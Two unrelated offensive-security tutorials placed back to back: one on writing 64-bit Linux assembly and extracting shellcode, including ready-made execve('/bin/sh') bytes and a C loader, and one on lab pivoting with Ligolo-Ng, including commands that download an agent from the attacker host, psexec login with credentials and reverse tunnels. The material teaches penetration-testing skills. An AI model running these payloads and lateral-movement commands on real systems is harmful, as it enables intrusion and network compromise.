64-bit Linux Assembly and Shellcoding

Introduction

Shellcode is a sequence of machine instructions used as the payload when exploiting a vulnerability. An exploit is a small piece of code that targets a vulnerability. Shellcodes are written in assembly. We generally turn to sites like shell-storm.org to get shellcodes and attach them to our exploits. But how can we make our own shellcodes?

This series of articles focuses on creating our own shellcodes. In Part 1, we will learn the basic assembly instructions, write our very first assembly code, and turn it into a shellcode.

Table of Contents

  • Understanding CPU Registers
  • First Assembly Program
  • Assembling and Linking
  • Extracting Shellcode
  • Removing NULLs
  • A sample shellcode execution
  • Conclusion

Understanding CPU registers

"Assembly is the language of OS." We have all read this in our computer science textbooks in high school. But how is assembly written? How is the assembly language able to control our CPU? How do we make our assembly program?

Before going into assembly, let's understand our CPU registers. An x86-64 CPU has various 8-byte (64-bit) registers that can be used to store data, do computation, and other tasks. These registers are physical and built into the chip. They are the fastest storage the CPU has, far faster than RAM and orders of magnitude faster than a hard disk. A program that works only with registers avoids the cost of memory access almost entirely.

A CPU contains a control unit and an execution unit, among other things. The execution unit works with the registers and flags.



There are many registers on the CPU. But for this part, we only need to know about the general-purpose registers.



64-bit registers

(ref: researchgate.net)

So, in the image above we can see the eight legacy registers (RAX, RBX, RCX, RDX, RDI, RSI, RBP, RSP) followed by R8 to R15. These are the general-purpose registers. The CPU also has others, such as the MMX registers, which we'll encounter later on.

Of these, the four data registers are:

RAX - Accumulator. Used for input/output and most arithmetic operations.

RBX - Base Register. Historically used as a base pointer for memory addressing.

RCX - Count Register. Used for counting, for example as a loop counter.

RDX - Data Register. Used in I/O operations, and together with RAX for multiply/divide operations involving large values.

Again, these are only the conventional roles. We can use these registers in any other way we like.

Next, the three pointer registers are:

RIP - Instruction Pointer. Stores the address of the next instruction to be executed.

RSP - Stack Pointer. Stores the memory address of the top of the stack.

RBP - Base Pointer. Marks the base of the stack frame for the current function. This makes it easier to access function parameters and local variables at fixed offsets from RBP. For example, a compiler might place a function's first local integer variable at RBP-4.

Finally, there are 2 Index registers:

RSI - Source Index. It is mainly used as the source index for string operations.

RDI - Destination Index. It is mainly used as the destination index for string operations.

 

Apart from these, the CPU has a status register whose individual bits are known as flags. Each flag holds 1 when set and 0 when clear. Some of these are:

CF - Carry Flag. Set when an arithmetic operation produces a carry or a borrow.

PF - Parity Flag. Reflects the parity of the lowest byte of a result: PF=1 if that byte contains an even number of “1” bits, otherwise PF=0.

ZF - Zero Flag. Set when the result of the previous operation is zero. Conditional jumps such as JZ and JNZ test this flag.

Now we are ready to write our first program in assembly.

First Assembly Program

An assembly program usually has three main sections:

1.      Text section - Program instructions are stored here

2.      Data section - Defined (initialized) data is stored here

3.      BSS section - Uninitialized data is reserved here.

Note also that there are two main syntax flavors for assembly on 64-bit Linux: AT&T syntax and Intel syntax.

If you have used GDB before, you will have noticed that it displays assembly in AT&T syntax by default. Which one to use is a personal preference. Some people like AT&T syntax, but we will use Intel syntax because it reads more clearly.

Let's write our first "Hello World" program.

We always start by defining our skeleton code. I'll create a file with the extension ".asm"



We always start with a global directive. Unlike C, assembly has no main function to mark where the program starts. Instead, the symbol "_start" marks the entry point: the global directive exports it so that the linker can find it, and in section .text the _start label tells the assembler where the instructions begin.

For full details about global directives, refer to this post.

Now, we have to define a message "Hello World." Since this is a piece of data, it must come in .data section



This is how variables are declared:

<variable>: <data type> <value>

The name of the variable is “message”. It is defined as a sequence of bytes (db=define bytes) and ends with an end line (0xa is the hex value for "\n").

For full details about data types in assembly, refer to this post.

Now that we have declared a message, we need instructions to print it.

It is important to know that assembly programs rely on the system calls of the underlying OS. At the time of writing, Linux has 456 system calls, which are defined in /usr/include/x86_64-linux-gnu/asm/unistd_64.h

You can also find an online searchable table here: https://filippo.io/linux-syscall-table/

The syscall used to print a message is "write." It uses these arguments:





So, each syscall takes its arguments in specific registers. Once we know what a syscall expects in each register, we can perform any syscall. To perform write, we need these values in these registers:

rax -> 1

rdi -> 1 (stdout in Linux is defined by fd=1)

rsi -> Message to display

rdx -> length of the message (which is 12 including end line)

But how do we put these values into the registers? Assembly offers many instructions for this, and the most common one is “mov”. It copies a value:

  • Between registers
  • From memory to a register, or from a register to memory
  • From immediate data to a register
  • From immediate data to memory

So, we will just move these values into dedicated registers and our code becomes like this:



However, manually calculating the length of a message is not always feasible, so we'll use a little trick. We define a new symbol for the length using "equ" (equals) followed by "$", which denotes the current offset, and subtract the offset of the start of our message from it to get the length of the message.

We also need the "syscall" instruction to actually invoke the "write" call we have set up. Until "syscall" executes, the values simply sit in the registers and nothing is written.



Finally, we also need to exit from the program. sys_exit syscall in Linux performs this operation.



So, rax -> 60

And rdi -> any value we want as the exit status. Let's give this 0 for now.



Assembling and Linking

Now this code is ready to run. Running assembly code always takes these steps:

1.      Assemble using nasm

2.      Link using ld

An assembler produces object files as output. The linker then resolves the symbols in the object file, combines it with any other object files or libraries it needs, and creates an executable. We will use “nasm” to do the assembling and “ld” to link.

Since we want a 64-bit ELF, the commands are:

nasm -f elf64 1.asm -o 1.o

ld 1.o -o 1

./1



As we see, we have now generated an executable file that is printing "hello world." Perfect. We can now proceed to create our shellcode using this binary.

Extracting shellcode

We created our assembly code and made an executable out of it that prints something. Let's say a simple exploit (not a very useful one, haha) wants to deliver a payload that prints “Hello World”. How would one do this?

For this, we need to extract the instruction bytes from our executable. We can use objdump to do this.

Viewing the binary with objdump shows our assembly code with the instruction bytes in hex alongside it. We pass -M intel because we want the output in Intel syntax.

objdump -d 1 -M intel



We all know computers only understand binary. However, displaying raw binary on screen is not practical, so objdump shows each instruction byte in hexadecimal, a compact notation for the same values. These bytes are the machine code that the CPU decodes and executes.

Removing NULLs

We need to extract these bytes and use them in our C code! Simple? BUT WAIT!

Another fundamental point is that a null byte can cut a payload short: string functions such as strcpy treat 0x00 as the end of the input, so anything after it is never copied. So we must remove null bytes from our shellcode to prevent it from being truncated. Knowing exactly which instructions avoid null bytes comes with practice, but certain tricks can be used in simple programs to achieve this.

For example, using "xor rax,rax" would assign rax=0 since xoring anything with itself gives 0.



So, we can do "xor rax,rax" and then "add rax,1" to set RAX to 1.

In our code, you'll observe that every mov instruction produces 0s, because the small immediate value is padded with zero bytes to fill the operand. So, if we have to assign a value of “1”, we can xor the register to make it 0 and then “add” 1. The “add” instruction simply adds the given value to the named register.

Following this trick we can re-write our code like this:



Let's see if we still have 0s or not.



We can still observe some 0s in movabs and mov instructions. We can use some tricks to reduce these 0s further.



This would still produce 0s near mov rsi, message. We can reduce this by using "lea". The “lea” (load effective address) instruction computes an address and loads it into a register. This is a form of “memory referencing”. We’ll see the details in a future article on rel and memory referencing.



We can still see 2 null bytes there but for now, this is workable. We can use the "jmp call pop" technique to remove this as well. Let's talk about that in further articles.



This binary also works. Let's extract these bytes and turn them into a shellcode. We could copy them manually (tiring!), but let's use some command-line fu instead:

objdump -d ./PROGRAM | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'



Shellcode: \x48\x31\xc0\x48\x83\xc0\x01\x48\x31\xff\x48\x83\xc7\x01\x48\x8d\x35\xeb\x0f\x00\x00\x48\x31\xd2\x48\x83\xc2\x0c\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05

 

 

Sample shellcode execution

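The shellcode we just created cannot be executed from a C program because “Hello World” is fetched as static data: the bytes reference the string at an offset into the original binary's data section, which no longer exists once only the instruction bytes are copied elsewhere. To solve this, we will utilize another technique called JMP, CALL, and POP, which we will cover in the next article. For this part, let’s focus on executing a ready-made shellcode.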

 

On sites like shell-storm.org, you would observe that the assembly of a program is given, and then the related shellcode as well. For example, here we see that an assembly program is written to execute “execve(/bin/sh)” which spawns up a new shell using the Linux system call “execve”

 



The shellcode observed is: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

 

To execute this shellcode, we need to write a small C program. Here is a skeleton:

 

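#include <stdio.h>
#include <string.h>

/* Replace <shellcode> with the \x-escaped bytes of the payload. */
char code[] = "<shellcode>";

int main(void)
{
    /* strlen stops at the first null byte, so this also reveals stray nulls. */
    printf("len:%zu bytes\n", strlen(code));
    /* Cast the array to a function pointer and call it. */
    (*(void(*)()) code)();
    return 0;
}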

 

So, the code becomes like so, and we have to compile it with modern compiler protections disabled (with gcc this typically means options such as -fno-stack-protector and -z execstack). Also, note that we are using Ubuntu 14 to test our shellcode, since even with protections disabled, modern systems may still block the execution of such shellcodes (due to memory permissions or ASLR issues), which we will tackle in future articles.

 



 

Now, we can run this binary and observe how it spawns a new shell!



 

 

Conclusion

 

In this article, we saw how to write our own assembly programs using registers and Linux syscalls, build an executable, and then extract the instruction bytes using objdump. These instruction bytes can then be used as the payload in an exploit, which is what makes them a shellcode. We created a shellcode that prints “Hello World”, but we didn’t execute it from the C program. The reason is that “Hello World” was static data in the program, and the assembly we wrote cannot load its address correctly once the bytes are taken out of the original binary. To fix this, we have to use a technique called JMP, CALL, POP, which makes use of the stack. We shall see this in the next article. Thanks for reading this part of the series.

A Detailed Guide on Ligolo-Ng

This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool's unique features to practical applications such as single and double pivoting within a network.

Download Ligolo-Ng:

Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.

Table of Contents:

1.       Introduction to Ligolo-Ng

2.       Ligolo V/S Chisel

3.       Lab Setup

4.       Prerequisites

5.       Setting up Ligolo-Ng

6.       Single Pivoting

7.       Double Pivoting

Ligolo-Ng Overview:

Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include a proxy and agents written in Go, VPN-like behavior, and a customizable proxy. Traffic such as ICMP, UDP, SYN stealth scans, OS detection, and DNS resolution can pass through the tunnel, with connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.

Ligolo V/S Chisel:

  • Ligolo-Ng outperforms Chisel in terms of speed and customization options.
  • Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
  • Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
  • Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.

 

 

Lab Setup

Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.

 


Prerequisites

Obtain the Ligolo 'agent' file for Windows 64-bit and the 'proxy' file for Linux 64-bit.

Install the 'agent' file on the target machine and the 'proxy' file on the attacking machine (Kali Linux).



Setting up Ligolo-Ng

Step 1: After obtaining both the agent and proxy files, the next step is to set up Ligolo-Ng. Use the 'ifconfig' command to check the current state of the Ligolo-Ng configuration. To create and activate the interface, execute the following commands:

 

ip tuntap add user root mode tun ligolo

ip link set ligolo up

Verify that the ligolo interface is active with the ‘ifconfig’ command.



Step 2: Extract the Ligolo proxy archive:

tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz

This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the 'help' command

./proxy -h



Step 3: The options displayed in the preceding image cover the different ways of supplying a certificate to the proxy. Here we use the '-selfcert' option, which makes the proxy use a self-signed certificate; the proxy listens on port 11601. Execute the command below, as illustrated in the accompanying image:

./proxy -selfcert



Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command:

unzip ligolo-ng_agent_0.5.1_windows_amd64.zip

To facilitate the transmission of this agent file to the target, establish a server with the command:

updog -p 80



Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands:

cd Desktop

powershell wget 192.168.1.5/agent.exe -o agent.exe

dir



Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file.

./agent.exe -connect 192.168.1.5:11601 -ignore-cert



Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the 'session' command, opting for '1' to access the active session. Following the session establishment, execute the 'ifconfig' command as illustrated in the provided image.

Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.



Single Pivoting

In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network A.


 

Attempting a direct ping to Network B fails, as illustrated in the image below, because it sits on a different network.



To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands:

ip route add 192.168.148.0/24 dev ligolo

ip route list



Return to the Ligolo proxy session window and initiate the tunneling process by entering the 'start' command, as demonstrated in the provided image.

 


Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.



Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.



Double Pivoting

 

In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.

 


 

From the newly opened terminal window, use the Impacket tool to access the identified Windows 10 machine at 192.168.148.132. Then execute the following commands to download the Ligolo agent onto Windows 10:

impacket-psexec administrator:123@192.168.148.132

cd c:\users\public

powershell wget 192.168.1.5/agent.exe -o agent.exe

dir



Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational.

agent.exe -connect 192.168.1.5:11601 -ignore-cert

 


Examine the Ligolo-Ng proxy server: a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the 'start' command to initiate additional tunneling.

 


Execute the 'session' command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the 'ifconfig' command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.

 


Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C.



Add the Network C Subnet in the IP route list with the following command.

ip route add 192.168.159.0/24 dev ligolo

ip route list

 


 

With the modification of our IP route, the next step involves the addition of a listener to traverse the intra-network and retrieve the session. To incorporate the listener, utilize the following command:

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444



The image above confirms the activation of the listener. To initiate tunneling, review the available options using the help command. The tunnel running in session 1 must be stopped before one can be started in session 2. So, stop the tunnel in the first session using the 'stop' command, then execute the 'start' command in the second session, following the steps illustrated in the image below. Traffic now flows through the second agent, and the listener forwards the data it receives back to the attacking machine. This operational technique is known as double pivoting.

 


Double pivoting was successful, which we verified using crackmapexec with the command:

crackmapexec smb 192.168.159.0/24

This revealed Metasploitable2 within the network. With the acquired network access, we could then run a ping and an nmap scan against it, as illustrated in the image below: